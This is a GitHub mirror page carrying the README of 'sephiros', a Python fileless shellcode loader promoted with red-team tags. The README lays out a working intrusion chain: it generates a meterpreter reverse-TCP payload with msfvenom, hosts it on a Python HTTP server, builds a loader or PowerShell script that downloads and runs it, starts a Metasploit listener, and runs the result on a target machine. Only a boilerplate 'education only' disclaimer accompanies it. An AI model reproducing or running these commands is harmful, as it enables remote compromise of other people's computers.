Giter Site home page Giter Site logo

elmerikh / sephiros Goto Github PK

View Code? Open in Web Editor NEW
1.0 1.0 0.0 9.56 MB

Fileless Shellcode Loader with Python

Python 100.00%
fileless-attack python-redteam python-shellcode shellcode-execute shellcode-injection shellcode-injector shellcode-loader shellcode-python fileless-shellcode redteam-shellcode shellcode-fileless

sephiros's Introduction

Alt text

Greetings

sephiroth is a Fileless Shellcode Loader with Python :

Usage: python Sephiros.py -url 'urlforshellcode'

u can generate a ps1 script with -ps instead of building into exe

python Sephiros.py -url 'urlforshellcode' -ps

you can also just embed shellcode into the PE directly using -sh 'pathofshellcode'

python Sephiros.py -sh 'pathto_shellcode'

setup

pip install -r requirements.txt

python Sephiroth.py

fileless execution example:

generate shellcode with:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=0.0.0.0 LPORT=5555 -f raw -o shellcode

python3 -m http.server 80

then:

python Sephiroth.py -url http://yourip/shellcode

start metasploit listener

execute PE on target machine

todo

asymetric encryption to the shellcode

DISCLAIMER :

ME The author takes NO responsibility and/or liability for how you choose to use any of the tools/source code/any files provided. ME The author and anyone affiliated with will not be liable for any losses and/or damages in connection with use of Sephiros. By using Sephiros or any files included, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again Sephiros is for EDUCATION and/or RESEARCH purposes ONLY

sephiros's People

Contributors

elmerikh avatar

Stargazers

 avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.